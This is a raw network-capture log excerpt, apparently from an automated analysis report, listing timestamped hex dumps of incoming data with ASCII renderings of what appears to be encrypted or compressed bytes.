                                                                                                                                                2022-09-29 12:51:45 UTC24041INData Raw: 8e 60 bc ef 55 b9 fe ba a6 5e 02 ef d6 a7 2e 63 7e d9 88 94 8b ab 70 07 a9 2b 62 db bc cb 1b 80 fa 5c 9e 8d 49 f7 8a b5 92 8a d1 d5 bd 4a 84 3f 01 26 cb cd 09 9c 1f ed 4b 05 14 ab d5 ac bf a5 47 7b 0d fc ce a6 12 93 1e aa e3 11 6b 13 f7 92 2d 3d 30 71 f0 cb cb 27 a3 1d b2 c9 05 cd a0 0d f7 57 03 8c f3 da c0 a7 58 9a 9f 43 36 5c cd 80 ff 33 c3 21 57 41 9f ed 2d 4a 08 4a 2a 11 5b d1 0b e0 30 9f 50 1a c5 7d 53 f4 3c ea ca 6d 24 58 17 b6 1d 05 41 6e 18 40 d9 22 0a 4c 3d ef 7c e6 38 28 41 32 e2 fc 2f 4c 07 dd cd 86 8d 14 03 89 98 1a a2 80 80 73 9f 6f 60 c6 e5 43 ba d3 07 4e 55 2c 38 06 b4 46 1c 20 0f 62 cc 33 56 9d 02 64 c6 1c 4f bd e0 91 c0 ae 49 a6 f2 3c a8 f0 e9 c8 b1 d1 e5 9c 9f 41 78 ae be 5d 80 bb 54 99 83 80 1d 37 c3 c0 34 a1 21 b8 aa 16 e3 cf 75 88 b4
                                                                                                                                                Data Ascii: `U^.c~p+b\IJ?&KG{k-=0q'WXC6\3!WA-JJ*[0P}S<m$XAn@"L=|8(A2/Lso`CNU,8F b3VdOI<Ax]T74!u
                                                                                                                                                2022-09-29 12:51:45 UTC24057INData Raw: 98 60 02 25 8c ec 6a d9 1f dd fe 6a 2a fc 47 9c 28 aa 7f e7 08 b1 6e e2 81 8c 16 9c ca fa f5 2d c8 2c 3e bc 43 11 36 a0 dc 52 62 ef ce d3 7d 3c 38 3e fe 90 8c f8 ef c1 4a 70 3f bc a1 b9 33 76 c3 cf bb 24 e9 6e 0f 9b 11 84 fe d7 20 d7 9e f2 e3 36 b9 20 d3 61 31 6e 25 e7 d1 68 4e 90 14 f9 21 0a 83 c5 00 80 a2 e7 7e 72 0e 38 9e 9d 15 81 a9 00 06 c2 20 83 64 e1 1f aa 06 6e d6 8b de 59 f9 b7 f2 df c3 a9 4b ee 1c a4 c5 9c f1 52 fa 16 c1 c5 63 3d c6 d9 3b ff f7 3b 43 7f d0 12 54 ad 88 9d 5e fa 02 0e 71 0d 99 c8 84 ec 6c c7 78 be 6a fa bd 28 55 62 4b 9c 05 22 8c 32 8c 64 52 0e 1b 5c 8f 20 e3 cf 1c 3c 39 f2 84 a6 c6 33 92 12 dc 26 df be 2f 21 11 fb d0 01 7b fc e9 02 50 80 97 d3 26 93 33 dc d4 38 97 c7 f1 22 62 af 4a 66 29 83 67 f3 ee e3 92 57 dc 37 b2 e2 df cc 63
                                                                                                                                                Data Ascii: `%jj*G(n-,>C6Rb}<8>Jp?3v$n 6 a1n%hN!~r8 dnYKRc=;;CT^qlxj(UbK"2dR\ <93&/!{P&38"bJf)gW7c
                                                                                                                                                2022-09-29 12:51:45 UTC24073INData Raw: 86 c8 e7 fe 5c b6 b5 ca e5 64 94 f7 0a dc eb 69 3c 06 70 4e ce 9b d0 3c e8 a2 57 09 b5 42 70 fe 99 13 fc c5 3c 5f da 29 63 10 96 5a 8f be d8 11 04 96 5e 70 e0 3a 7a f5 16 27 7e 78 35 05 ea aa 40 59 60 9b 39 3e 7a e4 43 90 55 83 96 f4 fc 67 07 3d f6 71 ac 3b 28 02 da da d9 46 88 96 58 fb 81 2e f3 bd 1a 4e 29 e3 3f 76 21 5e 68 ea 34 4d 69 95 45 f5 54 cf 7e e4 5c d8 e8 b4 ac cd a7 98 50 64 3a fc cf ab 38 30 14 81 2a 28 0d 83 7d 64 d4 13 21 79 d0 b4 a1 2e 79 86 f9 e0 1e 74 9a 9a 57 9e 30 3a 63 5c 06 64 0d 30 21 be dd c9 ec 65 e9 2d 9a 14 d8 a5 c7 ee 5e 3c 23 8d 7e 4b 59 0b 6b d3 13 0b e2 1e a2 19 34 68 33 2a 74 75 cf 80 71 1b 2b 80 cd f0 95 44 9d 3f 87 11 7f cc 9f 6a bb a6 53 38 f5 1b e1 a8 68 31 60 6b e4 2b 21 92 75 80 39 9e da 09 1c 35 db 97 34 eb 47 09 b7
                                                                                                                                                Data Ascii: \di<pN<WBp<_)cZ^p:z'~x5@Y`9>zCUg=q;(FX.N)?v!^h4MiET~\Pd:80*(}d!y.ytW0:c\d0!e-^<#~KYk4h3*tuq+D?jS8h1`k+!u954G
                                                                                                                                                2022-09-29 12:51:45 UTC24089INData Raw: 23 54 f7 87 c8 11 40 8f 0a 77 02 27 6e ca d4 85 e6 df d2 84 62 71 bc bc 2e bd 9f d5 e4 f9 9c c5 bf 5b 5f e6 03 c6 a9 90 e7 2f a1 8f d6 d8 fa ac 0c a1 73 a8 b9 e9 b1 f1 56 df 98 6a a0 f7 ac be e2 2d e6 4c 35 35 2b 6b 60 9b 39 b3 81 6e 20 8c be 29 13 50 33 ec 96 26 fd ba b6 68 bf 60 08 93 4c a4 9f b5 aa 4f 13 bf 03 1f df 3b b7 86 9d 4a 56 80 f2 3a 70 d6 e5 ef 5e fe 96 5f 45 5f ba c6 48 ae c1 de bd 10 e7 27 c0 c3 a4 cb c5 58 3f 8c 0a 7a 90 92 5e 20 7a 16 b1 da bb c1 e5 d7 b9 bd 08 07 ab 0a da 01 27 56 a1 8c 19 1d bd 44 05 3a 6e 46 43 01 2d 96 8d c0 66 5c 02 ac 3c 30 d5 04 65 ab 4b b9 fd 68 c5 fb 31 99 34 36 ae ee 78 6d b0 ac 85 9c d3 01 3d 05 86 fb 44 c5 0c f0 f8 5d 97 4d 1f a5 d5 ac 4f 7f b6 f0 03 5a 29 53 06 6d 98 7d 9b 55 42 f1 ca f7 04 0f f8 1e ca bd 6a
                                                                                                                                                Data Ascii: #T@w'nbq.[_/sVj-L55+k`9n )P3&h`LO;JV:p^_E_H'X?z^ z'VD:nFC-f\<0eKh146xm=D]MOZ)Sm}UBj
                                                                                                                                                2022-09-29 12:51:45 UTC24105INData Raw: 9d 7e 45 b3 6c 72 b7 17 46 01 f4 1e ee 41 29 f7 a3 b3 53 38 e9 f0 5b 44 79 c9 d7 13 0f 76 9e 96 03 b9 d0 29 85 52 97 92 fa df 5d ac b7 15 49 7f 45 f9 65 d6 a7 18 89 67 8a d2 f9 b0 01 66 c8 d4 1e ea cc e7 7f b5 9a 72 99 32 3d e7 aa 26 8e 2f f0 de f4 c1 cb 1e ef c0 9c ca fa 26 6f 3f 73 26 f8 ac 7f e4 c9 72 3a 24 c9 72 79 c9 96 ee 39 57 96 50 13 80 0d 65 f4 71 12 55 0a df 36 0a 6a 77 cc 78 4b b5 05 f9 49 55 29 09 cf ac 25 26 5a 84 c0 6e 36 a7 42 f0 c8 49 fa 3d 80 72 56 04 46 af 49 21 a3 ec 8d 41 cc 08 62 a4 23 2c bf 41 9a 3f 31 6b 18 5a 9c 45 05 89 4f df 42 6c 10 b5 42 fc 75 12 1b a7 90 bb 14 84 c5 ba 11 4b ab c6 4d 23 47 44 9f 72 08 7f eb 85 94 d2 21 18 fe 20 1d 9f 07 6b a4 e8 fa ee 20 ae cf 6b 7a 7f ce 75 99 f1 44 60 14 45 9b e9 04 f8 75 a5 ad ba 92 02 9d
                                                                                                                                                Data Ascii: ~ElrFA)S8[Dyv)R]IEegfr2=&/&o?s&r:$ry9WPeqU6jwxKIU)%&Zn6BI=rVFI!Ab#,A?1kZEOBlBuKM#GDr! k kzuD`Eu
                                                                                                                                                2022-09-29 12:51:45 UTC24121INData Raw: b6 d3 6d 35 23 be a5 72 77 9d 29 5e 96 3c 3d aa ca 01 ae b3 bd ef c5 c6 ed 23 03 e9 ac 2d 4d 38 83 53 35 5e 09 92 76 a7 4f 43 e6 d9 7a c8 5c c4 89 9d df 3e 66 c6 b3 5f 31 14 70 54 b3 00 04 c8 4d 0d e7 89 84 38 eb 8f 4a cb 9f 4f d3 0b d7 6d f3 b4 b3 cb d0 81 bd 19 fa 19 92 3c ce 89 96 e5 6f 92 36 c2 00 20 22 92 c9 3a ea 86 b7 6f 82 b5 08 f7 07 9f 30 90 21 f7 bc f6 8e 75 48 74 50 24 55 c8 3e e8 b3 ae b1 7b f5 82 19 1c 5d 85 05 6e 0c 1d 51 8b aa 8d e1 41 a2 1a 94 36 64 87 bd 96 51 e5 8d df 7c a1 06 a3 e3 b5 97 18 52 b7 14 33 21 58 9b 8b da 4a 38 35 53 ca 0c 2d 5e 16 ff fe 12 d0 7b 26 00 6e a5 63 e3 bd bb 32 39 c5 d9 bf 0a 76 f6 a6 08 40 10 4c fb c6 d2 d5 a7 d0 16 96 99 3e de 4b f1 54 e9 10 80 ad 8b 82 82 fc 3e f0 05 aa d5 ce 51 74 81 89 8e 5e 50 5b 94 b6 e3
                                                                                                                                                Data Ascii: m5#rw)^<=#-M8S5^vOCz\>f_1pTM8JOm<o6 ":o0!uHtP$U>{]nQA6dQ|R3!XJ85S-^{&nc29v@L>KT>Qt^P[
                                                                                                                                                2022-09-29 12:51:45 UTC24137INData Raw: ce 22 69 95 59 f1 f3 c9 3e 27 8e f1 6f 7c 11 41 4a ad ca 9d 2f 4e ee de 87 08 e1 bf 5e 03 40 b4 66 8c 7f 48 f2 e4 94 c8 d8 8f 05 fd 24 c4 23 b3 c9 b1 bd 7c ef cf b9 91 94 33 71 93 f0 1a 18 63 6c b5 e2 2d 35 97 37 b3 f9 41 b3 fa 45 82 e4 13 b3 af 16 b8 51 2f 75 39 8c 73 48 3c 54 e8 21 13 71 2d 42 e2 c3 3d 88 c5 47 7e cd 68 4d 01 99 33 ed de 0f db 5c e9 f6 07 87 ac 4d 49 29 36 4d 9c 68 88 88 eb 57 71 c5 ce e2 c6 72 e1 ec a4 7c ee 33 94 11 0f b8 57 be 50 3f a6 c3 e6 25 95 04 ce 1b a0 47 ab 0c 67 9b c9 c6 02 59 7a 5e bd e3 7c 74 01 c2 17 dc 37 82 43 83 8f 2b f3 05 25 36 fa e5 b4 75 24 ac cf 57 92 cb cc 23 5b fe b8 90 a6 2c 84 e3 c2 f7 e5 2a 5a 58 c2 c7 73 20 ec 23 84 bd 1a a2 b8 29 40 ab 0c 62 c7 7c cf 6f 92 d8 cf 26 94 06 3b 56 02 16 30 c7 ea bb 0a 6f 39 07
                                                                                                                                                Data Ascii: "iY>'o|AJ/N^@fH$#|3qcl-57AEQ/u9sH<T!q-B=G~hM3\MI)6MhWqr|3WP?%GgYz^|t7C+%6u$W#[,*ZXs #)@b|o&;V0o9
                                                                                                                                                2022-09-29 12:51:45 UTC24153INData Raw: 53 96 bd bb 41 57 5e 6f 1f b8 de 55 af 12 75 54 e9 3b c2 cb ee f0 16 76 54 ca 3d 9c d4 88 a8 fc 06 35 c6 e5 da 17 cc f9 1d f0 37 a1 d8 94 3e 1a 13 f8 5f 48 b6 7b 44 47 86 3d 93 6f 3d e0 c9 38 53 8e 01 35 3d d8 ea bc 26 e9 2d 7c 6c 88 c5 c6 73 3b e6 ed a9 6a e9 30 c7 55 ac 8f 0b 14 5a 4c b7 f5 e1 0c f0 cd a6 7d 99 22 e9 6b a8 fb 40 b3 5f 3c 8e 2e 73 10 71 7d e9 a5 35 b1 9c 1d 21 26 ef 0f 5a 34 cf 7d d1 40 f7 fd a8 b9 eb 93 cb 5b 98 54 54 4b 19 60 eb 4d 37 ef 0b 08 3b 25 44 91 93 5c 4a c5 8d 23 f7 3f 24 29 4a 8a fa a0 9d ce 96 60 ce b5 4d b6 ef 95 ae a3 1b bb 20 10 42 c5 54 a0 94 24 56 88 4c 77 7c 5e 1d 03 0a fd fe a6 76 ad 87 24 a6 52 dd 97 06 c8 25 fd 28 1f ab 23 f5 81 b6 3b a2 ca 96 04 ac a6 99 68 b0 64 df 7e 90 9d 6c b1 58 aa 7d 54 f1 ee 53 ec 5c b6 36
                                                                                                                                                Data Ascii: SAW^oUuT;vT=57>_H{DG=o=8S5=&-|ls;j0UZL}"k@_<.sq}5!&Z4}@[TTK`M7;%D\J#?$)J`M BT$VLw|^v$R%(#;hd~lX}TS\6
                                                                                                                                                2022-09-29 12:51:45 UTC24169INData Raw: 5c bc 8e 66 fe 4f 01 26 9a 22 aa b6 de 08 23 96 a1 af 94 a7 71 46 ae b5 7d 09 38 4d 9e 31 43 6e 62 76 1f b7 7e 18 e8 c3 12 7e 06 58 fc 97 5d cb ef 74 95 ad 71 44 e9 7f 0c ed a7 98 03 e6 f0 0d 4e 1b e0 3f ef 6c af d1 22 e3 90 b1 64 85 eb b5 30 f2 ca 26 10 ce 6e a0 9a 9e c7 20 43 6f c5 8d b1 0f 3d 9f b3 9a da c5 ce 6e 65 f9 47 22 8e 65 5f 0c 94 4c f6 c6 df 97 79 a9 2b 89 94 9f 40 46 e9 01 d8 c1 17 e7 18 ef a5 4c 69 04 80 51 37 59 07 3c cb 17 4b d4 7d d6 4a 21 4f b7 b4 e0 55 39 37 8f 80 4f ae df 62 85 51 51 56 a1 16 17 28 eb 08 27 65 5c 4b af 93 23 12 73 e0 ca c8 e8 6a 7c 09 95 6a dc 04 20 a2 58 f0 a6 0d 77 82 14 24 8f e5 85 00 e8 cc 54 b3 64 8c 48 82 95 85 fd 24 56 71 9c e5 28 cd 3e 47 dc b9 fb 86 e3 01 fd bb d4 c9 5d d5 80 bf 28 06 39 ad ff fc 20 26 96 b7
                                                                                                                                                Data Ascii: \fO&"#qF}8M1Cnbv~~X]tqDN?l"d0&n Co=neG"e_Ly+@FLiQ7Y<K}J!OU97ObQQV('e\K#sj|j Xw$TdH$Vq(>G](9 &
                                                                                                                                                2022-09-29 12:51:45 UTC24185INData Raw: b3 15 8c ab 6c 1d 15 5b 29 70 d6 69 fd 5d 3b 10 b6 06 b5 70 3c 48 2d 1d a1 d2 22 0a aa cb 56 05 50 23 7c 61 9f a5 c1 12 04 4b fe 3e 43 e5 72 b8 45 51 4a 98 fd 63 69 0c eb 55 5e a4 bf 08 ac bc ce 53 0c 78 5e 5e cd e4 fe d8 73 cb 5a 09 4b 7d c5 6e 54 47 9e ed 8f 4a 34 91 68 09 90 91 e3 5b 93 81 c4 0f 58 36 a9 99 89 98 a3 44 0c 54 7f fd bb 0e 49 e6 82 ac 1f 0c 95 40 11 63 11 a3 12 9e c3 12 ad 58 48 6a f8 35 1c d1 c4 4a 38 f9 b3 29 56 52 3e b3 f7 d3 aa 1b fe 25 56 2e ad b9 bd 28 70 43 4d 17 f3 19 f3 d2 58 f9 93 f9 5a 21 bf c0 6c 8b f7 20 37 2c 18 c6 0c e9 46 e2 fb c7 4a 59 db 1c cb 3f 9c 0f a5 7f 44 bd 2f 87 b0 43 68 73 86 ca 5c 9e d0 8f 4f 44 4e ee 95 68 37 6a 2f 56 2f 85 57 1f 42 98 ff 92 6d 05 ec 9f f0 3b d5 49 b7 29 07 bb c0 bc 3d c5 3b 5a df f6 90 14 93
                                                                                                                                                Data Ascii: l[)pi];p<H-"VP#|aK>CrEQJciU^Sx^^sZK}nTGJ4h[X6DTI@cXHj5J8)VR>%V.(pCMXZ!l 7,FJY?D/Chs\ODNh7j/V/WBm;I)=;Z
                                                                                                                                                2022-09-29 12:51:45 UTC24201INData Raw: 63 e0 a6 f1 47 7c 47 d9 02 7b a3 02 2d f8 69 19 c1 cc a5 c6 71 b2 1e ec c2 d7 0c 34 20 e9 34 f2 b3 71 9f 93 25 ca 7e 3c ea 5f 1a f2 4c 9f 95 3c 74 ba aa ba eb 14 01 a4 f2 68 56 9d f0 56 f6 30 96 a5 04 e9 ea 59 b3 52 da 83 3b 75 5d 28 88 56 87 47 b6 4a 9d f5 00 c6 d1 8e 41 34 a9 03 9e 9a c1 0f b4 05 71 92 57 7c 71 6b e5 57 6e 6b a1 12 23 bc a1 06 92 99 7f 05 86 b9 bc 71 be 86 84 c7 ff 1c 63 d2 c5 f2 fb cf d2 30 5a fd 36 64 08 3f 2d d8 c3 b9 91 7e a6 3e 43 52 df 2f 50 d0 3e 48 f7 40 de 6c d4 05 9b 3f e6 43 a4 43 08 e0 70 c5 18 b7 d6 45 36 5b ab a6 3c f1 1d fc 4c f1 1b 76 49 64 c8 ea 4e 09 35 e8 e4 af d8 59 5d 92 b3 a5 86 a1 c7 2a e6 a7 34 a9 39 45 8e 63 e7 21 1a f5 41 7d ab ed 80 43 6c 14 c0 0c cf 35 27 c3 0e 11 52 bf 75 0a 4a 9d 3a 4d 2e de 9e 83 d0 08 b7
                                                                                                                                                Data Ascii: cG|G{-iq4 4q%~<_L<thVV0YR;u](VGJA4qW|qkWnk#qc0Z6d?-~>CR/P>H@l?CCpE6[<LvIdN5Y]*49Ec!A}Cl5'RuJ:M.
                                                                                                                                                2022-09-29 12:51:45 UTC24217INData Raw: a5 4e 58 a6 49 7d 55 91 62 7b e6 7d 8a e0 eb 9d 73 db ab 72 18 ac bb da 93 f1 38 fc e0 73 2e 89 61 48 06 30 7e e7 0b 38 b4 7a 8c 5b 7b 93 9b b5 fa 68 83 ff ff 6d d9 d1 29 57 ff a0 44 7e 2a fb 8d 33 27 cd 12 1a ee 03 fb 68 35 30 a8 1d 3f cd ad 15 21 06 4f a1 44 99 65 88 99 18 69 40 52 f6 f5 d9 9c 80 79 8b 58 28 c5 7e 5e 49 a6 2d 72 c5 7b ff 0d aa 89 c0 a3 d9 40 6f b8 73 16 6f 65 14 af 00 d1 30 a6 75 b5 24 29 64 5e 13 f9 7c 46 1e f3 d3 69 20 f1 36 c6 e4 34 6c f2 16 2b 85 f6 06 b6 ef 15 f0 06 4a e2 15 dc fc e7 e2 06 5c fe e1 78 6b 05 dd d7 8c 25 c4 06 c4 e9 d4 82 05 8b 8f 17 a0 83 40 c5 5c 33 48 a3 60 c6 2b b9 14 79 bf 31 92 db e5 54 49 26 89 81 a7 5d 2c e3 d0 3d d5 38 ac 0f 31 82 01 8c 96 99 6f b7 51 8a 47 f9 44 36 03 6a f2 b4 a7 5b c6 01 80 f3 b1 ad ea 7b
                                                                                                                                                Data Ascii: NXI}Ub{}sr8s.aH0~8z[{hm)WD~*3'h50?!ODei@RyX(~^I-r{@osoe0u$)d^|Fi 64l+J\xk%@\3H`+y1TI&],=81oQGD6j[{
                                                                                                                                                2022-09-29 12:51:45 UTC24233INData Raw: 50 5c d2 a0 a8 73 69 fb 0c 85 3c 0f a8 b1 12 4e 8e cd e6 d1 b2 ff a6 e6 64 a4 66 c2 84 b8 d4 2a ff bc 4d c1 dc fd 2f c5 2a 87 37 4c 97 ea 89 98 d8 87 81 93 67 5f a6 f7 5d dc 7c fe c9 a1 f3 77 08 1d 19 0b 98 23 00 ec 8a 4f af f9 42 dc 8f 95 c3 3e cc ca 0f fc 8d 16 54 e2 88 6d fb 70 9b 3e 8a 1f ad 4b 04 53 9e 1f f3 42 00 15 39 bc 2b 3f 44 80 8a 74 25 3b 2b cb 20 2c ea 3a 11 a6 e2 f8 8b d8 1a 79 04 01 97 7f c5 08 2f 1f d8 1a 37 f6 9a df 9e b2 30 6b ef 43 00 d8 cf ef 33 d8 75 7b 5e 5b a4 02 de 06 0b 26 d4 11 e3 b0 5e 6d 94 b3 f0 dc 98 9c 86 fe fe cf f9 e8 c4 ea b5 4a 0a df ab 13 2f 9c dc c3 36 6f 53 9a 54 44 98 2f 38 31 f1 a9 98 40 48 77 99 42 79 0e 4d 57 01 01 65 b6 d0 4b 3d c3 10 a7 45 cd 14 cd 5a 7f a6 29 09 55 b0 6d b7 b7 70 22 5b 56 f3 a4 3d fb 91 a9 ff
                                                                                                                                                Data Ascii: P\si<Ndf*M/*7Lg_]|w#OB>Tmp>KSB9+?Dt%;+ ,:y/70kC3u{^[&^mJ/6oSTD/81@HwByMWeK=EZ)Ump"[V=
                                                                                                                                                2022-09-29 12:51:45 UTC24249INData Raw: 69 77 a8 7c e8 8a 39 2a 08 43 ea d5 77 12 41 d2 d9 89 ef 3f d2 fa 52 20 38 f8 00 6b 71 e9 94 b0 e5 e0 27 72 ee 22 59 e2 31 cd 2d 4e 37 6a b4 bd a6 f2 41 28 96 b6 88 4e 5a a6 33 a4 9d b0 7d 2f 18 29 05 98 97 95 2f 75 d3 90 4a eb c3 f9 8c 01 64 48 ec cd 16 7b 18 6b 77 4f 71 b6 9a 5c b2 9d e3 c0 68 02 40 ed 69 7e 16 8c 17 17 d0 b3 56 b9 e1 65 a6 1d 64 a8 2a 69 45 c3 cc d6 71 85 c3 fb e8 07 c8 9d b4 e6 27 1f ee fb 17 1a 2e 0f e1 b7 81 ab 94 a2 4b 44 69 04 e3 af e3 f0 75 e9 61 2e f9 c6 ed 40 90 c7 4a fc d1 23 52 eb 4e 91 fb 73 d7 14 45 0d d1 d8 4a e9 c2 ee 43 b4 5d b4 58 31 37 8f bb 61 9a 67 9c db e8 71 7a fe 85 ea d9 2f 18 cc d7 a7 78 e1 d4 62 ad 07 7d ae 89 03 97 59 a3 c7 92 a7 d5 5b 11 6c e6 ac 22 0b cb 16 81 5d 69 8b 6a 78 f6 c6 94 6b fb 96 32 af 32 e8 ab
                                                                                                                                                Data Ascii: iw|9*CwA?R 8kq'r"Y1-N7jA(NZ3}/)/uJdH{kwOq\h@i~Ved*iEq'.KDiua.@J#RNsEJC]X17agqz/xb}Y[l"]ijxk22
                                                                                                                                                2022-09-29 12:51:45 UTC24265INData Raw: 16 b5 27 e1 f7 fb ba 4b 80 4c b6 0d 76 40 52 79 a1 58 49 6b d8 82 11 9d 16 da ba 15 b5 f2 25 97 50 01 f1 74 10 aa c1 19 df 73 1d 11 77 ff e3 ee 98 6f f0 a2 37 05 45 ac df c3 69 77 c9 f7 60 70 1c ae 23 36 b0 1d 59 b0 ff 32 96 d2 8d be 9b 03 92 08 73 55 85 5f b4 4e d5 ab 77 77 c5 be af fc 5e 38 f0 b9 e4 c0 f4 8e 8e ac 8b 12 4a 7d 6d 91 7d 11 1e 1d f5 09 e0 57 43 7e ce 18 cd fa e6 17 be 98 60 66 1e ed 03 9d 34 75 41 d8 1b 62 27 23 30 97 d3 6b fe 1e 05 ce a0 da 2a c6 70 3a a3 5a 5e 9e 4a aa e6 b2 ea 97 ab 92 d9 d2 34 a5 df a7 08 49 97 88 ed 8a ec f5 ce 15 7a 19 5b 86 be 8e ed 22 1e c9 39 e8 25 83 93 06 15 43 fb d7 dc e0 67 db 85 71 5c 71 a0 9e 38 0f 87 b9 4d 1d 7f 87 a4 d3 0f d5 e1 95 7a 3c 79 82 e4 3f b3 08 c6 63 63 ef e1 35 cd 2b e7 9f be 8c ff 1c db 3d 67
                                                                                                                                                Data Ascii: 'KLv@RyXIk%Ptswo7Eiw`p#6Y2sU_Nww^8J}m}WC~`f4uAb'#0k*p:Z^J4Iz["9%Cgq\q8Mz<y?cc5+=g
                                                                                                                                                2022-09-29 12:51:45 UTC24281INData Raw: ea b0 03 e6 93 46 99 a2 92 dd 6c 5c bd 51 61 ff ba 45 6f 81 84 31 e7 6c cd dc 00 92 28 e8 ac 27 c4 17 88 4a 0d 52 26 4a 5e 88 bb c1 0a ec 57 c5 61 1f 60 92 a8 f1 4e 4f 5a 07 82 86 77 00 fd 72 e2 6f 1b c5 bf 8d 35 16 38 f1 d8 9b bd 1d cc c1 d5 80 f2 ee 1d e6 4d 12 19 5c de a7 6a 66 2d c4 b0 b0 f6 7a 48 cf cc 73 bd 05 8d b9 b9 bd b1 fb 5d ff fc 55 03 28 6e 48 78 fe b8 19 42 0a 31 32 da 1a 38 fa b1 61 4f ab 45 fa 15 24 0f 74 dc 6e e9 49 cc ae 84 4f 5d 4d 1c 51 e2 78 7d 32 2c 44 e4 32 26 5e 20 c2 b9 48 07 9f 64 8a 77 d9 e4 a9 a0 c6 19 00 77 03 74 27 c7 8c 2a 90 47 ba 9b 47 0b 59 49 f3 6e 9e 11 12 35 1a 07 c1 f6 ad 44 7d b5 f5 2f ef 2f 86 b5 52 e5 ab 5b 02 2f 80 7e d0 ef 54 53 58 b8 b8 1c e7 40 1c 5e 6c c8 64 68 50 60 82 19 b8 de 9a fb 81 f5 f9 0d 1f fa d8 54
                                                                                                                                                Data Ascii: Fl\QaEo1l('JR&J^Wa`NOZwro58M\jf-zHs]U(nHxB128aOE$tnIO]MQx}2,D2&^ Hdwwt'*GGYIn5D}//R[/~TSX@^ldhP`T
                                                                                                                                                2022-09-29 12:51:45 UTC24297INData Raw: 22 86 30 3f ad 3c 8c e2 83 e9 51 90 f9 46 04 8b 05 09 d0 8b 04 5b de c6 cf 68 54 ab 40 7d 25 b2 cb ff 5e bf f3 d3 96 9b 14 3f 64 69 f1 5c ee 7a 6f 75 13 d8 67 44 e6 52 18 df b5 54 96 64 68 83 68 dd b1 76 08 8f 42 32 48 2c e3 08 b7 99 b9 39 d4 34 00 d2 f1 9c ea 13 fb 44 d9 0e 4b 37 55 10 98 c2 27 6e 5f e5 29 f3 67 16 62 fd 6d 2e 0a 54 81 66 51 a8 3c bc 38 2c 3a ce 5c ae d2 50 0e bc 51 5f 98 75 d6 b3 d8 3f 57 4d 3f e3 20 65 dc 62 bc 42 1b bb cd 80 f1 61 9a 83 9d b8 07 60 17 23 f2 a2 ee bf 64 b2 34 ee 67 99 2f 8c d7 c5 65 69 f6 f7 8f 29 9f 50 a1 91 c9 2f ef a2 57 8b c6 3b 58 32 3a 1c 65 fc 8a d5 cf 82 7b db e6 5e 64 e2 ff 00 d5 2d 26 f1 39 93 b7 8d c0 5d bd 48 c2 87 a4 88 28 ce 89 a8 23 31 c3 f6 22 31 8a 2a eb d3 a2 4d dd 6c 1c a5 d0 f2 95 2f 95 df 6a 9a 67
                                                                                                                                                Data Ascii: "0?<QF[hT@}%^?di\zougDRTdhhvB2H,94DK7U'n_)gbm.TfQ<8,:\PQ_u?WM? ebBa`#d4g/ei)P/W;X2:e{^d-&9]H(#1"1*Ml/jg
                                                                                                                                                2022-09-29 12:51:45 UTC24313INData Raw: 61 62 58 e9 f2 b7 a4 e6 18 fe 37 f4 23 77 7f bf b2 15 4b 2b fa 46 a4 bb 94 b7 d4 9d 43 1d 86 a7 9e 75 82 98 7e ff 97 4c 97 37 d3 c5 34 a4 6d 0d 5c 5a ca c2 30 ea 78 45 e7 77 6a 40 cd d0 64 db a3 1f 9b 07 c4 5e 62 4d ea 42 0b 58 32 e2 a6 17 2e b5 65 8f 63 e9 1b 87 3a 04 e2 9f ff 2d 99 43 7e e7 d2 2b b1 d7 98 cb 39 fb 99 63 af c4 62 26 15 ba 2b 59 98 c5 96 97 ec c9 3e 77 3a b4 b2 e7 af eb e1 ae c1 7b 31 4a 10 77 83 90 0c ff e0 71 20 a8 a8 ed 08 46 33 0f a9 64 e6 b9 df db f4 6c 7a 81 0e 19 a6 89 19 51 e7 02 71 43 c5 1e 27 40 12 a6 c3 42 2b 47 63 77 28 e4 16 bb 47 fb 84 9e a3 60 7a e1 59 20 a3 db ed e5 bb ad f5 46 9b 0c f4 87 c7 9d 12 c6 14 19 d6 a9 0d 7e 12 dc 9c 13 5c 50 6e d3 84 e0 08 79 78 b3 b8 53 0c 55 a2 2a c0 41 bb ad dc 0f fc 12 77 ff fb 5c b8 b5 e2
                                                                                                                                                Data Ascii: abX7#wK+FCu~L74m\Z0xEwj@d^bMBX2.ec:-C~+9cb&+Y>w:{1Jwq F3dlzQqC'@B+Gcw(G`zY F~\PnyxSU*Aw\
                                                                                                                                                2022-09-29 12:51:45 UTC24329INData Raw: b4 01 17 6c d2 24 7f fa 17 c2 2b ab a9 9a 9b d6 a7 e4 33 e3 0d ac 59 c1 79 54 d9 28 dc 39 00 34 fb 75 e7 c7 c8 3d b0 4a 52 d6 76 8a e8 e9 aa 07 99 19 94 a3 41 15 17 e6 fa f4 55 58 11 64 62 3a 9e 33 41 3c ea 4a b8 ab 05 67 60 2f 8b 3f 3e 88 be 9a 22 e6 cc e6 a8 97 10 a3 b2 7e 86 33 53 fd 29 90 05 2f aa 4e 85 b9 ca 26 3b f0 26 5f 3e b2 57 ca c1 73 f9 14 ff 0d c3 eb 2c e9 93 db 65 2d 46 14 71 cc 0d 46 28 b8 1d ff 86 ff ca 85 4e 2d 44 eb 68 30 e9 c8 ac 7a 08 76 c7 2e 30 83 78 2f 0f a1 f3 20 a8 c7 bb 34 bc d3 ba b3 40 7f 74 7e 27 fa b8 2e fd 76 e2 cd e6 05 62 95 57 ea 7e 56 35 d4 5b e2 00 07 9d 49 5a ef 5f 9f 96 3c 78 d4 c6 e6 19 b7 5e f6 f6 68 1a 7d 33 1f ad 08 90 3e 22 7b 4c f9 fd cd 4f 76 72 87 dd 10 e1 ab 0a 31 67 de 75 a0 86 b3 0b d2 60 a6 a8 8b cc 3f 6d
                                                                                                                                                Data Ascii: l$+3YyT(94u=JRvAUXdb:3A<Jg`/?>"~3S)/N&;&_>Ws,e-FqF(N-Dh0zv.0x/ 4@t~'.vbW~V5[IZ_<x^h}3>"{LOvr1gu`?m
